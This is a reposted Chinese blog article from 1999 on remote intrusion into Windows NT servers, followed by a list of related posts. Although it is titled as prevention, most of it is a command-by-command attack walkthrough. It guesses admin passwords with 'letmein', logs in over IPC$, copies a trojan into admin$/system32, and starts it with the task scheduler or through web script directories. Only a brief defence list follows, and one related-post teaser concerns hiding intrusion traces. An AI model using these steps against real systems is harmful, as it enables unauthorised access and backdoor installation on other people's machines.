防止远程入侵Windows NT

原创 2005年03月03日 23:25:00

防止远程入侵Windows NT

作者:Billows     1999/03/12

微软推出的Windows NT系统平台,曾经在网络组建上风靡一时,至今还有许多的网络系统使用它,但它的网络漏洞在微软的不断补丁下依然存在,每当我们为它打上微软的补丁后,新的漏洞又出现了。而利用这些漏洞进行网络远端入侵也是相当简单的事了。

现在我们来看看如何远端入侵Windows NT主机!

攻击步骤:

首先,我们要攻击远端目标当然得知道对方得IP地址了,你可以使用各种扫描工具查找目标机器的IP地址,这里因为重点不是它所以就不多说了。

在确定攻击目标后,使用Windows NT自带的命令取得远端目标的用户列表资源,分析取得的列表资源,尝试取得管理员权限。letmein命令用于通过指定的密码远程登录服务器,并读取服务器上的用户信息,配以不同的参数,可以获取相应的控制权。例如:

letmein file://x.x.x.x/ -all -g mypwd(将查看//x.x.x.x上的所有用户账户列表,并试图通过参数后面跟随的密码取得管理员的控制权)

letmein file://x.x.x.x/ -admin -g mypwd

(可以查看//x.x.x.x上管理员的账户列表,并试图通过参数后面跟随的密码取得管理员的控制权。)

letmein file://x.x.x.x/ -all -d mypwd

(试图通过参数后面跟随的密码取得用户控制权,并显示//x.x.x.x上所有用户名列表。)

当使用letmein命令获取相关管理员权限后,使用Windows提供的标准命令连接远程资源并将木马拷入远程目标,你可以使用的木马是很多的,这里不作介绍了,具体的命令是:

net use //x.x.x.x/ipc$ "pass"/user:"user" (利用刚刚猜解到的用户名和密码登录//x.x.x.x主机)

copy x:/netserver.exe //x.x.x.x/admin$/system32(拷贝本地木马程序netserver.exe到远端//x.x.x.x的管理员目录下)

再使用合法Windows NT命令远程启动刚才考入的木马程序:

netsvc //x.x.x.x schedule /start at //x.x.x.x hh:mm netserver.exe/port:yourport /nomsg

在上面的命令中利用了Windows NT的任务计划管理,在指定的时间和指定的端口运行木马程序。

另一种方法:

将需要运行的木马或其他可执行程序Copy到远端服务器的www可执行目录下( 如cgi-bin或scripts等),然后在浏览器键入远端连接url来运行木马程序,如:http://x.x.x.x/scripts/ntsrver.exe/port:yourport或http://x.x.x.x/cgi-gin/ntsrver.exe/port:yourport等。

到此,该次入侵可以算成功了,远程资源已在自己的控制下。

攻击原理:

简单分析一下这次攻击的过程,不难看出,关键步骤是利用letmein取得admin权限,但是很不幸,就目前部分的采用Windows NT系统平台服务器而言,所采用的网络管理密码,利用破解工具仅仅多花几分钟就能破解掉。同时,通过对某些大的公共平台服务器进行测试扫描的结果,使用Windows NT系统平台的服务器,其管理密码被letmein猜中率有75%以上。而且在这些被进入的机器上,SMB(文件和打印共享)又都是运行在TCP/IP协议上,而且只有部分服务器有配备火墙,一般没有封闭对外的137∽139端口,从而给网络入侵留下了后门。

防范措施:

1.管理人员应该及时检查日记和监控服务的运行,定时对文件系统的权限受托关系进行检查。

2.对密码的选择有一个好的习惯。一个好的密码必须包括下面的内容:好记忆、不易被猜到、易输入,至于怎么才能作到,很多文章都有介绍的,这里就不多讲。

3.适当配置NT网络服务,特别是TCP/IP协议,尽量不要在对外的服务上绑定共享服务。

4.防火墙的配置要合理,屏蔽一切不需要的服务端口,像在TCP/IP上的137∽139端口,开这些端口只会使你的系统处于危险的处境,如果必须要在远程使用这些端口的服务,建议使用其他软件来代替,而不是单纯使用系统内定的服务。

一次ADSL远程入侵

今天上网,一边给朋友做着网站,不经意看到朋友QQ上的IP地址,就顺手拿出SuperScan,在地址中设置好要扫描的IP范围为218.*.*.*-218.*.*.255,端口是缺省设置 ,Start,开...
  • net2kc
  • net2kc
  • 2004-11-07 18:05:00
  • 2840

防止黑客用IE浏览器实现远程控制

 来源:硅谷动力听说过灰鸽子、冰河等可以实现远程控制,但你听说过IE也可以实现吗?不错,一款基于IE的新鲜工具——rmtSvc&vIDC即可让微软的IE成为一个超级黑客帮凶。本文除了将为你展现rmtS...
  • yandong19861103
  • yandong19861103
  • 2008-12-17 11:09:00
  • 528

全方位了解黑客如何入侵WindowsNT系统

现在的企业当中一般都是使用的NT系统,也不得不承认,NT系统的确是非常适合企业使用的操作系统,然而“黑客”的攻击引来了企业信息安全危机…… 得到了NT的管理员密码还能做什么,还不是想做什么就做什么呗。...
  • smartsky
  • smartsky
  • 2007-05-26 12:54:00
  • 599

Discuz!NT 3.5.2 关于不能在64位系统部署问题彻底解决办法

Discuz!NT 3.5.2 论坛出来了,还是不能在64位系统部署,到官网发帖寻问答,没有一个人回复,最好还是自己搞吧。http://www.cnblogs.com/wuvist/archive/2...
  • suyiming
  • suyiming
  • 2011-03-28 10:45:00
  • 1141

BackTrack及其工具保护企业环境免遭远程入侵

攻击者通常寻找远程安全漏洞,目的是为了对你网络上的资源搞破坏。BackTrack Linux是一款用于测试安全的发行版,可帮助你检查自己的网络和服务器,查找远程安全薄弱环节和潜在的安全漏洞。    ...
  • js07diy
  • js07diy
  • 2013-04-05 19:23:57
  • 522

更改远程桌面连接MSTSC端口3389防止入侵

为防止他人进行恶意连接,就需要对默认端口进行更改。 开始--运行--regedit 依次展开 HKEY_LOCAL_MACHINE/SYSTEM/CURRENTCONTROLSET/CONTRO...
  • sharkill
  • sharkill
  • 2014-08-30 19:06:15
  • 358

如何隐藏自己入侵的痕迹,防止反追踪

这是我无意间在“中国信息安全研究小组(CISRG) ”提出的问题,7all给了我解答。我有时间会一一补充。为什么我用“隐藏”而不用“擦除”,因为我觉得入侵的痕迹只能无限隐藏而不可能完全清除。一下是7a...
  • fallingleaf
  • fallingleaf
  • 2007-04-07 12:09:00
  • 1592

Linux安全问题之防黑客入侵

用于入侵检测日志 需要检查的系统日志文件主要包括一般信息日志、网络连接日志、文件传输日志以及用户登录日志等。在检查这些日志时要特别注意时间记载分析日志产生的时间是否合理。 可疑的日志记录 ...
  • xb12369
  • xb12369
  • 2015-04-09 18:00:03
  • 1310

教你如何关闭1433端口,防止服务器入侵!

 本人最近发现有人利用黑客工具入侵EP服务器为自己的会员卡充钱,为了避免不必要的经济损失,希望大家尽快把此漏洞给补上。我认真的研究了一下,发现此黑客工具主要是用1433端口进行入侵。只要我们把此端口给...
  • mubingyun
  • mubingyun
  • 2008-11-12 14:22:00
  • 16030

网络入侵的几种常用方法

我认为这是一套适合初学者由浅到深的文章,所以强烈推荐给大家,作者从基础讲到最近比较火的漏洞,可能有些人看来是浅了些,但是的确很适合想干点啥但又不知道怎么办的菜鸟们 。第一节,伸展运动。这节操我们要准备...
  • liuguizhong
  • liuguizhong
  • 2007-12-08 23:17:00
  • 3891
收藏助手
不良信息举报
您举报文章:防止远程入侵Windows NT
举报原因:
原因补充:

(最多只允许输入30个字)